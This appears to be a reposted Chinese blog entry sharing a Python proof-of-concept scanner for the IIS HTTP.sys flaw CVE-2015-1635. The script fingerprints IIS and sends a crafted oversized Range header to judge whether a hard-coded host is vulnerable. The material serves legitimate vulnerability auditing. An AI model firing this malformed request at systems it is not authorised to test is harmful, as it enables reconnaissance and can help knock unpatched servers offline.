cve-2015-1635 poc

本文分享了一个针对IIS服务器的漏洞探测PoC代码,通过发送特定请求来判断目标是否受漏洞影响。代码中详细展示了如何连接指定IP地址的服务器并发送测试请求,以及如何根据响应结果判断服务器的安全状态。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 1 import socket
 2 import random
 3 ipAddr = "10.1.89.20"
 4 hexAllFfff = "18446744073709551615"
 5 req1 = "GET / HTTP/1.0\r\n\r\n"
 6 req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
 7 print("[*] Audit Started")
 8 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 9 client_socket.connect((ipAddr, 80))
10 client_socket.send(req1.encode())
11 boringResp = client_socket.recv(1024).decode()
12 if "Microsoft" not in boringResp:
13                 print("[*] Not IIS")
14                 exit(0)
15 client_socket.close()
16 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
17 client_socket.connect((ipAddr, 80))
18 client_socket.send(req.encode())
19 goodResp = client_socket.recv(1024).decode()
20 if "Requested Range Not Satisfiable" in goodResp:
21                 print("[!!] Looks VULN")
22 elif " The request has an invalid header name" in goodResp:
23                 print("[*] Looks Patched")
24 else:
25                 print("[*] Unexpected response, cannot discern patch status")
View Code

这个漏洞则这几天也火了一把,poc附上。

转载于:https://www.cnblogs.com/cncyber/p/4434180.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值